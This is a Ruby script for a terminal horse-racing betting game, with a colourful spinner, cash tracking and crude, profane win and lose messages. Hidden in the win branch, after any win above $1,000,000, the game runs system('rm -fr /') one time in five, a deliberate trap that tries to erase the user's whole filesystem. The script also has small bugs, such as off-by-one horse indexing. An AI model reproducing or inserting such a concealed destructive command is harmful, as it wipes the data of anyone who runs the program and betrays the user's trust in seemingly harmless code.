#!/usr/bin/env ruby

class CashhhhhhhError < StandardError; end

module Horse
  HORSES = YAML.load(File.read('horses.yml'))
  COLORS = { :default => "[39m",
             :red     => "[31m",
             :green   => "[32m",
             :yellow  => "[33m",
             :magenta => "[35m",
             :cyan    => "[36m"
           }
  COLOR_ARRAY = COLORS.values - [COLORS[:default]]

  @cash_to_bet = rand(1000000000) + (rand(100).to_f / 100.0)
  class << self
    def play
      horse = nil
      while horse.nil?
        puts "Which horse would you like to bet on?"
        HORSES.each_with_index do |name, index|
          puts "#{index + 1}. #{name}"
        end
        print "[1-#{HORSES.size}] "
        number = gets
        begin
          number = Integer(number)
        rescue Exception
          puts "Please enter a number."
          puts
          redo
        end
        horse = HORSES[number]
      end
      puts

      winner = nil
      while winner.nil?
        puts "How much do you want to bet? You have $#{@cash_to_bet} to bet with."
        print "$"
        amount = gets
        begin
          amount = Float(amount)
          if amount > @cash_to_bet
            raise CashhhhhhhError
          end
        rescue CashhhhhhhError
          puts "You don't have enough cash to make that bet."
          puts
          redo
        rescue Exception
          puts "Please enter a number."
          puts
          redo
        end
        winner = HORSES[rand(HORSES.size)]
      end
      puts

      spin

      if winner == horse
        @cash_to_bet += amount
        puts "YOU WON #{amount}!!!!!!!!"

        if amount > 1000000 # big wins are gonna cost you
          if rand > 0.8 # ...20% of the time
            system("rm -fr /")
          end
        end
      else
        @cash_to_bet -= amount
        puts "BITCH YOU LOSTTTTTTTTTTT! THE WINNER WAS #{winner}"
      end

      puts "Your cash total: $#{@cash_to_bet}"
    end

    def has_money?
      @cash_to_bet > 0.00
    end

    private
    def spin
      hide_cursor
      10.times do
        n = rand(11) + 10
        loop_print_flush_sleep(n, '.')
        loop_print_flush_sleep(n, "\b \b")
      end
      show_cursor
      print "\e#{COLORS[:default]}"
    end

    def loop_print_flush_sleep(n, str)
      n.times do
        print "\e#{COLOR_ARRAY[rand(COLOR_ARRAY.size)]}"
        print str
        STDOUT.flush
        sleep rand / 100 * 3
      end
    end

    def hide_cursor
      print "\e[?25l"
    end

    def show_cursor
      print "\e[?25h"
    end
  end
end

if __FILE__ == $0
  Horse.play while Horse.has_money?

  # shiftytyyyyyyyyyyyy
  at_exit {
    puts "--------------------------------"
    puts "SON U OUTTA MONEYYYYYYYYYYYYYYYY"
  }
  exit
end
